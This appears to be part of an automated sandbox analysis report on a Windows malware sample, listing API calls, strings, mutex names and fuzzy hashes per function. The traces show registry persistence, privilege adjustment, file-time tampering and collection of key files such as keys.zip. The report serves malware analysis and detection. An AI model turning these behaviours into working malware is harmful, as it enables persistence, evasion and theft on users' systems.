                                                                                                                                                                                                            • Opcode ID: 54a1fd0513c7341940e0fdc9a5d0da8a2b75890889e8b8aa70a8a384ab5bb858
                                                                                                                                                                                                            • Instruction ID: 1a9e171d959fa5666bec33d9fe6f052f56b3537a4e1abecb4210c1e180beb4cc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54a1fd0513c7341940e0fdc9a5d0da8a2b75890889e8b8aa70a8a384ab5bb858
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4561A276A00209ABDB21CF68DC84AFEB7A9FF84364F048295FE0597741D7B0D951CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7B33
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7B4B
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,76F8F380), ref: 02BB7B6C
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,76F8F380), ref: 02BB7B92
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,76F8F380), ref: 02BB7C1D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,76F8F380), ref: 02BB7C24
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7C33
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,76F8F380), ref: 02BB7C63
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 4158279268-3673152959
                                                                                                                                                                                                            • Opcode ID: 6e22941ec68c055b5a0fda0f188c028ffb7ac1cf82aaa998a5e4a62ab63356d5
                                                                                                                                                                                                            • Instruction ID: 3c204aad1bfef03f5f911570e24a4f463aeaa38fbf9d434ae79501820aca1d1d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e22941ec68c055b5a0fda0f188c028ffb7ac1cf82aaa998a5e4a62ab63356d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9541D672900159AFEB25DB748899AFEB7BDEF88304F4045ECE655D3140D7B05A498BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC4902
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC491A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4941
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,-0000000B,00000104), ref: 02BC496F
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(-091561A1,software\microsoft,00000000,00000102,00000000), ref: 02BC49CE
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 02BC49FE
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 02BC4A0C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02BC4A1A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminCloseFlushOpenUserValuelstrcpynmemsetstrstr
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 1783443066-3673152959
                                                                                                                                                                                                            • Opcode ID: 7b905e4df933b5df2b0d52c27ae2fc1f2d62af18101dae220ed712ea72695774
                                                                                                                                                                                                            • Instruction ID: 125ec3e8b7df970167459bf06ff61ae1f6c4ed932a4c7ec44b39123f9f7e0629
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b905e4df933b5df2b0d52c27ae2fc1f2d62af18101dae220ed712ea72695774
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC314431A0021DAFDB26CB24DC19BEA7BB8EB05305F1001D8EB55AB140D7B09B48CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2248944234-2746444292
                                                                                                                                                                                                            • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                            • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SymGetModuleBase.DBGHELP(00000000,?,?,00000004), ref: 02BB3969
                                                                                                                                                                                                            • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02BB397C
                                                                                                                                                                                                            • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02BB3993
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB39BD
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB39E1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                            • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                            • API String ID: 844136142-2194319270
                                                                                                                                                                                                            • Opcode ID: dba257e986056fa52ba7f398e4c4a6a7197edc1146340f75abbb2a28b8cb1001
                                                                                                                                                                                                            • Instruction ID: a194af677cccbe824d24f2bd43b07e69aa8db3ed438e2e29214b96dcac3f596f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dba257e986056fa52ba7f398e4c4a6a7197edc1146340f75abbb2a28b8cb1001
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A21B1725402086BE7228A48DC85FFA77ACEF48745F44C5D5FE4A97101D7B09A588BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                            • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD32DC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD32E5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD32F9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD330B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD3316
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CE90,RFK), ref: 02BD3330
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD3336
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • RFK, xrefs: 02BD331C
                                                                                                                                                                                                            • Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BD32D0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02BCB91C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCB925
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB939
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCB94B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C15C), ref: 02BCB956
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C15C,ALPHA), ref: 02BCB970
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCB976
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ALPHA, xrefs: 02BCB95C
                                                                                                                                                                                                            • Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02BCB910
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028D9
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                            • String ID: PnSw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02BCCBAC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCCBB9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCCBCD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCCBDF
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCCBEE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCCBF5
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C260,BSS), ref: 02BCCC0F
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCCC15
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02BCCBA0
                                                                                                                                                                                                            • BSS, xrefs: 02BCCBFB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                            • String ID: BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: /$UT
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • API ID: memcpy$_snprintf
                                                                                                                                                                                                            • String ID: 0$%x$Content-Length
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB843
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBB870
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBB877
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBB889
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBB898
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBB8A2
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB8B4
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBB8E1
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBB8E8
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,?), ref: 02BBB8FB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C,?,?), ref: 02BD4329
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02BD43B5
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 02BD43D2
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD43D9
                                                                                                                                                                                                              • Part of subcall function 02BB7310: GetHandleInformation.KERNEL32(?,00000000), ref: 02BB7324
                                                                                                                                                                                                              • Part of subcall function 02BB7310: CloseHandle.KERNEL32(?), ref: 02BB7335
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                            • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path.txt
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\private\), ref: 02BCC139
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCC0E0,00000000,00000000,00000000), ref: 02BCC186
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\public\), ref: 02BCC19E
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCC0C0,00000000,00000000,00000000), ref: 02BCC1E2
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCC1FA
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCC20B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                            • String ID: \private\$\public\
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB69A2
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB69C0
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 02BB69DD
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02BB6A4D
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,698896B4a,00000000,00000001,?,00000104), ref: 02BB6A6F
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BB6A7D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$CloseOpenValuelstrcpyn
                                                                                                                                                                                                            • String ID: 698896B4a$software\microsoft
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD2827
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02BD2867
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 02BD2871
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2879
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD288A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?), ref: 02BD2891
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 02BD289E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: keys.zip
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowLongA.USER32(02BBCE3A,000000F0), ref: 02BBE26B
                                                                                                                                                                                                            • GetLastActivePopup.USER32(02BBCE3A), ref: 02BBE279
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02BBE293
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02BBE296
                                                                                                                                                                                                            • GetWindowInfo.USER32(00000000,?), ref: 02BBE2AC
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000004), ref: 02BBE2B5
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02BBE2EE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD32DC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD32E5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD32F9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD330B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD3316
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CE90,RFK), ref: 02BD3330
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD3336
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • RFK, xrefs: 02BD331C
                                                                                                                                                                                                            • Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BD32D0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02BCB91C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCB925
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB939
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCB94B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C15C), ref: 02BCB956
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C15C,ALPHA), ref: 02BCB970
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCB976
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ALPHA, xrefs: 02BCB95C
                                                                                                                                                                                                            • Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02BCB910
